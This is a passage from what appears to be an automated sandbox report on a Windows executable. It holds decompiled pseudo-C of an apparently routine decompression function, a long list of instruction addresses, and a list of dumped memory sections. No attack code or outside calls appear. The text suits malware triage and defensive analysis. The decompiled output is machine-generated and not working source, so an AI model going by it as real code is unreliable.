											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E00406B2B( &(__esi[3]), __edi, 0x101, 0x4073fc, 0x40743c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E00406B2B(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40747c, 0x4074b8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                                                                                            0x00406354
                                                                                            0x00406354
                                                                                            0x00406354
                                                                                            0x00406354
                                                                                            0x00406354
                                                                                            0x00406358
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040635e
                                                                                            0x0040635e
                                                                                            0x00406361
                                                                                            0x00406364
                                                                                            0x00406369
                                                                                            0x0040636b
                                                                                            0x0040636e
                                                                                            0x00406371
                                                                                            0x00406374
                                                                                            0x00406374
                                                                                            0x00406377
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406379
                                                                                            0x00406379
                                                                                            0x0040637c
                                                                                            0x00406381
                                                                                            0x00406383
                                                                                            0x00406386
                                                                                            0x0040638c
                                                                                            0x004060eb
                                                                                            0x004060eb
                                                                                            0x004060ee
                                                                                            0x004060f4
                                                                                            0x004060fa
                                                                                            0x00406103
                                                                                            0x00406109
                                                                                            0x0040610c
                                                                                            0x00406113
                                                                                            0x00406118
                                                                                            0x0040611e
                                                                                            0x00406129
                                                                                            0x00406129
                                                                                            0x00406392
                                                                                            0x00406392
                                                                                            0x0040639c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063a2
                                                                                            0x004063a2
                                                                                            0x004063a6
                                                                                            0x004063a9
                                                                                            0x004063a9
                                                                                            0x004063ad
                                                                                            0x004063b3
                                                                                            0x004063b3
                                                                                            0x004063b6
                                                                                            0x004063b9
                                                                                            0x004063bf
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063c1
                                                                                            0x004063e3
                                                                                            0x004063e3
                                                                                            0x004063e6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063c3
                                                                                            0x004063c7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063cd
                                                                                            0x004063cd
                                                                                            0x004063d0
                                                                                            0x004063d3
                                                                                            0x004063d8
                                                                                            0x004063da
                                                                                            0x004063dd
                                                                                            0x004063e0
                                                                                            0x004063e0
                                                                                            0x004063e8
                                                                                            0x004063e8
                                                                                            0x004063ee
                                                                                            0x004063f1
                                                                                            0x004063f4
                                                                                            0x004063f4
                                                                                            0x004063fb
                                                                                            0x004063ff
                                                                                            0x00406403
                                                                                            0x00406406
                                                                                            0x00406409
                                                                                            0x0040640f
                                                                                            0x00406414
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406416
                                                                                            0x0040642a
                                                                                            0x0040642a
                                                                                            0x0040642e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406418
                                                                                            0x0040641b
                                                                                            0x0040641b
                                                                                            0x00406422
                                                                                            0x00406427
                                                                                            0x00406427
                                                                                            0x00406427
                                                                                            0x00406430
                                                                                            0x00406430
                                                                                            0x00406433
                                                                                            0x00406441
                                                                                            0x00406447
                                                                                            0x0040644c
                                                                                            0x00406452
                                                                                            0x00406458
                                                                                            0x0040645e
                                                                                            0x00406465
                                                                                            0x00406479
                                                                                            0x00406479
                                                                                            0x00406a48
                                                                                            0x00406a48
                                                                                            0x00406a48
                                                                                            0x00406a4d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406085
                                                                                            0x00406085
                                                                                            0x00000000
                                                                                            0x00406680
                                                                                            0x00406680
                                                                                            0x00406684
                                                                                            0x00406687
                                                                                            0x0040668a
                                                                                            0x0040668d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406693
                                                                                            0x00406693
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x004066ba
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406698
                                                                                            0x00406698
                                                                                            0x0040669c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004066a2
                                                                                            0x004066a2
                                                                                            0x004066a5
                                                                                            0x004066a8
                                                                                            0x004066ab
                                                                                            0x004066ad
                                                                                            0x004066af
                                                                                            0x004066b2
                                                                                            0x004066b5
                                                                                            0x004066b5
                                                                                            0x004066b5
                                                                                            0x004066bc
                                                                                            0x004066bc
                                                                                            0x004066c4
                                                                                            0x004066c7
                                                                                            0x004066ca
                                                                                            0x004066cd
                                                                                            0x004066d1
                                                                                            0x004066d4
                                                                                            0x004066d6
                                                                                            0x004066d9
                                                                                            0x004066db
                                                                                            0x004066ef
                                                                                            0x004066ef
                                                                                            0x004066f2
                                                                                            0x0040670c
                                                                                            0x0040670c
                                                                                            0x0040670f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406715
                                                                                            0x00406715
                                                                                            0x00406718
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040671e
                                                                                            0x0040671e
                                                                                            0x00000000
                                                                                            0x0040671e
                                                                                            0x004066f4
                                                                                            0x004066f7
                                                                                            0x004066fe
                                                                                            0x00406701
                                                                                            0x00000000
                                                                                            0x00406701
                                                                                            0x004066dd
                                                                                            0x004066e1
                                                                                            0x004066e4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406729
                                                                                            0x00406729
                                                                                            0x0040674e
                                                                                            0x0040674e
                                                                                            0x0040674e
                                                                                            0x00406750
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040672e
                                                                                            0x0040672e
                                                                                            0x00406732
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406738
                                                                                            0x00406738
                                                                                            0x0040673b
                                                                                            0x0040673e
                                                                                            0x00406741
                                                                                            0x00406743
                                                                                            0x00406745
                                                                                            0x00406748
                                                                                            0x0040674b
                                                                                            0x0040674b
                                                                                            0x0040674b
                                                                                            0x00406752
                                                                                            0x0040675a
                                                                                            0x0040675d
                                                                                            0x00406760
                                                                                            0x00406762
                                                                                            0x00406765
                                                                                            0x00406765
                                                                                            0x00406767
                                                                                            0x0040676b
                                                                                            0x0040676e
                                                                                            0x00406771
                                                                                            0x00406774
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040677a
                                                                                            0x0040677a
                                                                                            0x0040679f
                                                                                            0x0040679f
                                                                                            0x0040679f
                                                                                            0x004067a1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040677f
                                                                                            0x0040677f
                                                                                            0x00406783
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406789
                                                                                            0x00406789
                                                                                            0x0040678c
                                                                                            0x0040678f
                                                                                            0x00406792
                                                                                            0x00406794
                                                                                            0x00406796
                                                                                            0x00406799
                                                                                            0x0040679c
                                                                                            0x0040679c
                                                                                            0x0040679c
                                                                                            0x004067a3
                                                                                            0x004067a3
                                                                                            0x004067ab
                                                                                            0x004067ae
                                                                                            0x004067b1
                                                                                            0x004067b4
                                                                                            0x004067b8
                                                                                            0x004067bb
                                                                                            0x004067bd
                                                                                            0x004067c0
                                                                                            0x004067c3
                                                                                            0x004067dd
                                                                                            0x004067dd
                                                                                            0x004067e0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004067e6
                                                                                            0x004067e6
                                                                                            0x004067e9
                                                                                            0x004067f0
                                                                                            0x00000000
                                                                                            0x004067f0
                                                                                            0x004067c5
                                                                                            0x004067c8
                                                                                            0x004067cf
                                                                                            0x004067d2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004067f8
                                                                                            0x004067f8
                                                                                            0x0040681d
                                                                                            0x0040681d
                                                                                            0x0040681d
                                                                                            0x0040681f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004067fd
                                                                                            0x004067fd
                                                                                            0x00406801
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406807
                                                                                            0x00406807
                                                                                            0x0040680a
                                                                                            0x0040680d
                                                                                            0x00406810
                                                                                            0x00406812
                                                                                            0x00406814
                                                                                            0x00406817
                                                                                            0x0040681a
                                                                                            0x0040681a
                                                                                            0x0040681a
                                                                                            0x00406821
                                                                                            0x00406829
                                                                                            0x0040682c
                                                                                            0x0040682f
                                                                                            0x00406831
                                                                                            0x00406834
                                                                                            0x00406834
                                                                                            0x00406836
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040683c
                                                                                            0x0040683c
                                                                                            0x0040683f
                                                                                            0x00406844
                                                                                            0x00406846
                                                                                            0x0040684c
                                                                                            0x0040684e
                                                                                            0x00406863
                                                                                            0x00406865
                                                                                            0x00406865
                                                                                            0x00406850
                                                                                            0x00406856
                                                                                            0x00406858
                                                                                            0x0040685a
                                                                                            0x0040685a
                                                                                            0x00406867
                                                                                            0x0040686b
                                                                                            0x0040686e
                                                                                            0x00406874
                                                                                            0x00406874
                                                                                            0x00406877
                                                                                            0x00406877
                                                                                            0x00406877
                                                                                            0x00406879
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040687f
                                                                                            0x0040687f
                                                                                            0x00406885
                                                                                            0x00406887
                                                                                            0x004068ac
                                                                                            0x004068af
                                                                                            0x004068b5
                                                                                            0x004068ba
                                                                                            0x004068c0
                                                                                            0x004068c6
                                                                                            0x004068c8
                                                                                            0x004068cb
                                                                                            0x004068d4
                                                                                            0x004068da
                                                                                            0x004068da
                                                                                            0x004068cd
                                                                                            0x004068cf
                                                                                            0x004068d1
                                                                                            0x004068d1
                                                                                            0x004068dc
                                                                                            0x004068e2
                                                                                            0x004068e4
                                                                                            0x004068e7
                                                                                            0x004068e9
                                                                                            0x004068ef
                                                                                            0x004068f1
                                                                                            0x004068f3
                                                                                            0x004068f5
                                                                                            0x004068f7
                                                                                            0x004068fa
                                                                                            0x00406903
                                                                                            0x00406906
                                                                                            0x00406906
                                                                                            0x004068fc
                                                                                            0x004068fc
                                                                                            0x004068ff
                                                                                            0x004068ff
                                                                                            0x004068fa
                                                                                            0x004068f1
                                                                                            0x00406908
                                                                                            0x0040690a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040690a
                                                                                            0x00406889
                                                                                            0x00406889
                                                                                            0x0040688f
                                                                                            0x00406895
                                                                                            0x00406897
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406899
                                                                                            0x00406899
                                                                                            0x0040689b
                                                                                            0x0040689d
                                                                                            0x004068a6
                                                                                            0x004068a6
                                                                                            0x0040689f
                                                                                            0x0040689f
                                                                                            0x004068a2
                                                                                            0x004068a2
                                                                                            0x004068a8
                                                                                            0x004068aa
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406910
                                                                                            0x00406910
                                                                                            0x00406915
                                                                                            0x00406917
                                                                                            0x00406918
                                                                                            0x00406919
                                                                                            0x0040691a
                                                                                            0x00406920
                                                                                            0x00406923
                                                                                            0x00406926
                                                                                            0x00406929
                                                                                            0x0040692b
                                                                                            0x00406931
                                                                                            0x00406931
                                                                                            0x00406934
                                                                                            0x00406934
                                                                                            0x00406934
                                                                                            0x00406934
                                                                                            0x0040693d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406942
                                                                                            0x00406942
                                                                                            0x00406945
                                                                                            0x00406948
                                                                                            0x0040694a
                                                                                            0x004069e1
                                                                                            0x004069e1
                                                                                            0x004069e4
                                                                                            0x004069e6
                                                                                            0x004069e7
                                                                                            0x004069e8
                                                                                            0x004069eb
                                                                                            0x00000000
                                                                                            0x004069eb
                                                                                            0x00406950
                                                                                            0x00406950
                                                                                            0x00406956
                                                                                            0x00406958
                                                                                            0x0040697d
                                                                                            0x00406980
                                                                                            0x00406986
                                                                                            0x0040698b
                                                                                            0x00406991
                                                                                            0x00406997
                                                                                            0x00406999
                                                                                            0x0040699c
                                                                                            0x004069a5
                                                                                            0x004069ab
                                                                                            0x004069ab
                                                                                            0x0040699e
                                                                                            0x004069a0
                                                                                            0x004069a2
                                                                                            0x004069a2
                                                                                            0x004069ad
                                                                                            0x004069b3
                                                                                            0x004069b5
                                                                                            0x004069b8
                                                                                            0x004069ba
                                                                                            0x004069c0
                                                                                            0x004069c2
                                                                                            0x004069c4
                                                                                            0x004069c6
                                                                                            0x004069c8
                                                                                            0x004069cb
                                                                                            0x004069d4
                                                                                            0x004069d7
                                                                                            0x004069d7
                                                                                            0x004069cd
                                                                                            0x004069cd
                                                                                            0x004069d0
                                                                                            0x004069d0
                                                                                            0x004069cb
                                                                                            0x004069c2
                                                                                            0x004069d9
                                                                                            0x004069db
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004069db
                                                                                            0x0040695a
                                                                                            0x0040695a
                                                                                            0x00406960
                                                                                            0x00406966
                                                                                            0x00406968
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040696a
                                                                                            0x0040696a
                                                                                            0x0040696c
                                                                                            0x0040696e
                                                                                            0x00406975
                                                                                            0x00406975
                                                                                            0x00406977
                                                                                            0x00406970
                                                                                            0x00406970
                                                                                            0x00406972
                                                                                            0x00406972
                                                                                            0x00406979
                                                                                            0x0040697b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004069f3
                                                                                            0x004069f3
                                                                                            0x004069f6
                                                                                            0x004069f8
                                                                                            0x004069fb
                                                                                            0x004069fe
                                                                                            0x004069fe
                                                                                            0x004069fe
                                                                                            0x004069fe
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004060ac
                                                                                            0x00406090
                                                                                            0x00000000
                                                                                            0x00406096
                                                                                            0x00406099
                                                                                            0x004060a3
                                                                                            0x004060a6
                                                                                            0x004060a9
                                                                                            0x00000000
                                                                                            0x004060a9
                                                                                            0x00406090
                                                                                            0x004060b4
                                                                                            0x004060b7
                                                                                            0x004060bb
                                                                                            0x004060c5
                                                                                            0x004060cf
                                                                                            0x004060d2
                                                                                            0x004060d8
                                                                                            0x0040620c
                                                                                            0x0040620e
                                                                                            0x00406214
                                                                                            0x00406217
                                                                                            0x0040621a
                                                                                            0x00000000
                                                                                            0x0040621a
                                                                                            0x004060de
                                                                                            0x004060de
                                                                                            0x004060df
                                                                                            0x00406137
                                                                                            0x00406137
                                                                                            0x0040613e
                                                                                            0x004061e4
                                                                                            0x004061e4
                                                                                            0x004061e9
                                                                                            0x004061ec
                                                                                            0x004061f1
                                                                                            0x004061f4
                                                                                            0x004061f9
                                                                                            0x004061fc
                                                                                            0x00406201
                                                                                            0x00406204
                                                                                            0x00406204
                                                                                            0x00000000
                                                                                            0x00406144
                                                                                            0x00406144
                                                                                            0x00406144
                                                                                            0x00406144
                                                                                            0x00406148
                                                                                            0x00406148
                                                                                            0x0040616a
                                                                                            0x0040616d
                                                                                            0x0040616f
                                                                                            0x00406172
                                                                                            0x00406177
                                                                                            0x0040614d
                                                                                            0x0040614d
                                                                                            0x00406152
                                                                                            0x00406154
                                                                                            0x00406156
                                                                                            0x0040615b
                                                                                            0x00406161
                                                                                            0x00406166
                                                                                            0x00406168
                                                                                            0x00406168
                                                                                            0x0040615d
                                                                                            0x0040615d
                                                                                            0x0040615d
                                                                                            0x0040615b
                                                                                            0x00000000
                                                                                            0x00406179
                                                                                            0x004061a6
                                                                                            0x004061ab
                                                                                            0x004061ad
                                                                                            0x004061ae
                                                                                            0x004061b0
                                                                                            0x004061b1
                                                                                            0x004061b1
                                                                                            0x004061b1
                                                                                            0x004061d9
                                                                                            0x004061de
                                                                                            0x004061de
                                                                                            0x00000000
                                                                                            0x004061de
                                                                                            0x00406177
                                                                                            0x0040613e
                                                                                            0x004060e1
                                                                                            0x004060e1
                                                                                            0x004060e2
                                                                                            0x0040612c
                                                                                            0x00000000
                                                                                            0x0040612c
                                                                                            0x004060e4
                                                                                            0x004060e5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406241
                                                                                            0x00406241
                                                                                            0x00406241
                                                                                            0x00406244
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406221
                                                                                            0x00406221
                                                                                            0x00406225
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040622b
                                                                                            0x0040622b
                                                                                            0x0040622e
                                                                                            0x00406231
                                                                                            0x00406236
                                                                                            0x00406238
                                                                                            0x0040623b
                                                                                            0x0040623e
                                                                                            0x0040623e
                                                                                            0x0040623e
                                                                                            0x00406246
                                                                                            0x00406246
                                                                                            0x00406249
                                                                                            0x0040624b
                                                                                            0x00406250
                                                                                            0x00406253
                                                                                            0x00406255
                                                                                            0x00406258
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040625e
                                                                                            0x0040625e
                                                                                            0x00406260
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406266
                                                                                            0x00406266
                                                                                            0x0040626a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406270
                                                                                            0x00406270
                                                                                            0x00406273
                                                                                            0x00406275
                                                                                            0x00406313
                                                                                            0x00406313
                                                                                            0x00406316
                                                                                            0x00406318
                                                                                            0x00406318
                                                                                            0x0040631b
                                                                                            0x0040631e
                                                                                            0x00406320
                                                                                            0x00406322
                                                                                            0x00406324
                                                                                            0x00406324
                                                                                            0x0040632d
                                                                                            0x00406332
                                                                                            0x00406335
                                                                                            0x00406338
                                                                                            0x0040633b
                                                                                            0x0040633e
                                                                                            0x0040633e
                                                                                            0x0040633e
                                                                                            0x00406341
                                                                                            0x00406347
                                                                                            0x00406347
                                                                                            0x0040634d
                                                                                            0x0040634d
                                                                                            0x0040634d
                                                                                            0x00000000
                                                                                            0x00406341
                                                                                            0x0040627b
                                                                                            0x0040627b
                                                                                            0x00406281
                                                                                            0x00406284
                                                                                            0x00406286
                                                                                            0x004062b1
                                                                                            0x004062b4
                                                                                            0x004062ba
                                                                                            0x004062bf
                                                                                            0x004062c5
                                                                                            0x004062cb
                                                                                            0x004062cd
                                                                                            0x004062d0
                                                                                            0x004062d9
                                                                                            0x004062df
                                                                                            0x004062df
                                                                                            0x004062d2
                                                                                            0x004062d4
                                                                                            0x004062d6
                                                                                            0x004062d6
                                                                                            0x004062e1
                                                                                            0x004062e7
                                                                                            0x004062ea
                                                                                            0x004062ec
                                                                                            0x004062ee
                                                                                            0x004062f4
                                                                                            0x004062f6
                                                                                            0x004062f8
                                                                                            0x004062fb
                                                                                            0x00406304
                                                                                            0x00406304
                                                                                            0x00406306
                                                                                            0x004062fd
                                                                                            0x004062fd
                                                                                            0x00406300
                                                                                            0x00406300
                                                                                            0x00406308
                                                                                            0x00406308
                                                                                            0x004062f6
                                                                                            0x0040630b
                                                                                            0x0040630d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040630d
                                                                                            0x00406288
                                                                                            0x00406288
                                                                                            0x0040628e
                                                                                            0x00406294
                                                                                            0x00406296
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406298
                                                                                            0x00406298
                                                                                            0x0040629a
                                                                                            0x0040629c
                                                                                            0x0040629f
                                                                                            0x004062a6
                                                                                            0x004062a6
                                                                                            0x004062a8
                                                                                            0x004062a1
                                                                                            0x004062a1
                                                                                            0x004062a3
                                                                                            0x004062a3
                                                                                            0x004062aa
                                                                                            0x004062ac
                                                                                            0x004062af
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063b3
                                                                                            0x004063b6
                                                                                            0x004063b9
                                                                                            0x004063bf
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406596
                                                                                            0x00406596
                                                                                            0x00406596
                                                                                            0x00406599
                                                                                            0x0040659c
                                                                                            0x0040659e
                                                                                            0x004065a1
                                                                                            0x004065a7
                                                                                            0x004065ae
                                                                                            0x004065b0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406484
                                                                                            0x00406484
                                                                                            0x004064ac
                                                                                            0x004064ac
                                                                                            0x004064ac
                                                                                            0x004064ae
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040648c
                                                                                            0x0040648c
                                                                                            0x00406490
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406496
                                                                                            0x00406496
                                                                                            0x00406499
                                                                                            0x0040649c
                                                                                            0x0040649f
                                                                                            0x004064a1
                                                                                            0x004064a3
                                                                                            0x004064a6
                                                                                            0x004064a9
                                                                                            0x004064a9
                                                                                            0x004064a9
                                                                                            0x004064b0
                                                                                            0x004064b0
                                                                                            0x004064b8
                                                                                            0x004064bb
                                                                                            0x004064c1
                                                                                            0x004064c4
                                                                                            0x004064c8
                                                                                            0x004064cc
                                                                                            0x004064cf
                                                                                            0x004064d2
                                                                                            0x004064ea
                                                                                            0x004064ea
                                                                                            0x004064ed
                                                                                            0x004064fb
                                                                                            0x004064fe
                                                                                            0x004064ef
                                                                                            0x004064ef
                                                                                            0x004064f1
                                                                                            0x004064f8
                                                                                            0x004064f8
                                                                                            0x00406527
                                                                                            0x00406527
                                                                                            0x00406527
                                                                                            0x0040652a
                                                                                            0x0040652c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406507
                                                                                            0x00406507
                                                                                            0x0040650b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406511
                                                                                            0x00406511
                                                                                            0x00406514
                                                                                            0x00406517
                                                                                            0x0040651a
                                                                                            0x0040651c
                                                                                            0x0040651e
                                                                                            0x00406521
                                                                                            0x00406524
                                                                                            0x00406524
                                                                                            0x00406524
                                                                                            0x0040652e
                                                                                            0x0040652e
                                                                                            0x00406530
                                                                                            0x00406532
                                                                                            0x0040653d
                                                                                            0x00406540
                                                                                            0x00406543
                                                                                            0x00406545
                                                                                            0x00406547
                                                                                            0x00406549
                                                                                            0x0040654c
                                                                                            0x0040654f
                                                                                            0x00406554
                                                                                            0x00406557
                                                                                            0x0040655a
                                                                                            0x0040655d
                                                                                            0x00406564
                                                                                            0x00406567
                                                                                            0x00406569
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040656f
                                                                                            0x0040656f
                                                                                            0x00406573
                                                                                            0x00406584
                                                                                            0x00406584
                                                                                            0x00406584
                                                                                            0x00406586
                                                                                            0x00406586
                                                                                            0x0040658a
                                                                                            0x0040658a
                                                                                            0x0040658a
                                                                                            0x0040658c
                                                                                            0x0040658d
                                                                                            0x00406590
                                                                                            0x00406590
                                                                                            0x00406590
                                                                                            0x00406593
                                                                                            0x00000000
                                                                                            0x00406593
                                                                                            0x00406575
                                                                                            0x00406575
                                                                                            0x00406578
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040657e
                                                                                            0x0040657e
                                                                                            0x00000000
                                                                                            0x0040657e
                                                                                            0x004064d4
                                                                                            0x004064d4
                                                                                            0x004064d6
                                                                                            0x004064d8
                                                                                            0x004064db
                                                                                            0x004064de
                                                                                            0x004064e2
                                                                                            0x004064e2
                                                                                            0x004065b6
                                                                                            0x004065b6
                                                                                            0x004065b9
                                                                                            0x004065c0
                                                                                            0x004065c4
                                                                                            0x004065c6
                                                                                            0x004065c9
                                                                                            0x004065cc
                                                                                            0x004065d1
                                                                                            0x004065d4
                                                                                            0x004065d6
                                                                                            0x004065d7
                                                                                            0x004065da
                                                                                            0x004065e5
                                                                                            0x004065e8
                                                                                            0x004065ff
                                                                                            0x00406604
                                                                                            0x0040660b
                                                                                            0x00406610
                                                                                            0x00406614
                                                                                            0x00406616
                                                                                            0x00406616
                                                                                            0x00406616
                                                                                            0x00406619
                                                                                            0x0040661b
                                                                                            0x00000000
                                                                                            0x00406621
                                                                                            0x00406621
                                                                                            0x00406625
                                                                                            0x00406630
                                                                                            0x00406643
                                                                                            0x00406648
                                                                                            0x0040664d
                                                                                            0x0040664f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406655
                                                                                            0x00406655
                                                                                            0x00406658
                                                                                            0x0040665a
                                                                                            0x00406668
                                                                                            0x00406668
                                                                                            0x0040666b
                                                                                            0x0040666b
                                                                                            0x0040666e
                                                                                            0x00406671
                                                                                            0x00406674
                                                                                            0x00406677
                                                                                            0x0040667a
                                                                                            0x0040667d
                                                                                            0x00000000
                                                                                            0x0040667d
                                                                                            0x0040665c
                                                                                            0x0040665c
                                                                                            0x00406662
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406662
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406a01
                                                                                            0x00406a01
                                                                                            0x00406a07
                                                                                            0x00406a0d
                                                                                            0x00406a12
                                                                                            0x00406a18
                                                                                            0x00406a1e
                                                                                            0x00406a20
                                                                                            0x00406a23
                                                                                            0x00406a2c
                                                                                            0x00406a32
                                                                                            0x00406a32
                                                                                            0x00406a25
                                                                                            0x00406a27
                                                                                            0x00406a29
                                                                                            0x00406a29
                                                                                            0x00406a34
                                                                                            0x00406a36
                                                                                            0x00406a39
                                                                                            0x00406a74
                                                                                            0x00406a74
                                                                                            0x00000000
                                                                                            0x00406a3b
                                                                                            0x00406a3b
                                                                                            0x00406a3b
                                                                                            0x00406a41
                                                                                            0x00406a44
                                                                                            0x00406a46
                                                                                            0x00406a7b
                                                                                            0x00406a7d
                                                                                            0x00000000
                                                                                            0x00406a7d
                                                                                            0x00000000
                                                                                            0x00406a46
                                                                                            0x00000000
                                                                                            0x00406085
                                                                                            0x00406a53
                                                                                            0x00000000
                                                                                            0x00406a53
                                                                                            0x00406467
                                                                                            0x00406469
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040646b
                                                                                            0x0040646b
                                                                                            0x0040646e
                                                                                            0x00000000
                                                                                            0x0040646e
                                                                                            0x004063b3
                                                                                            0x00406374
                                                                                            0x00406a58
                                                                                            0x00406a5b
                                                                                            0x00406a5d
                                                                                            0x00406a66
                                                                                            0x00406a6c
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
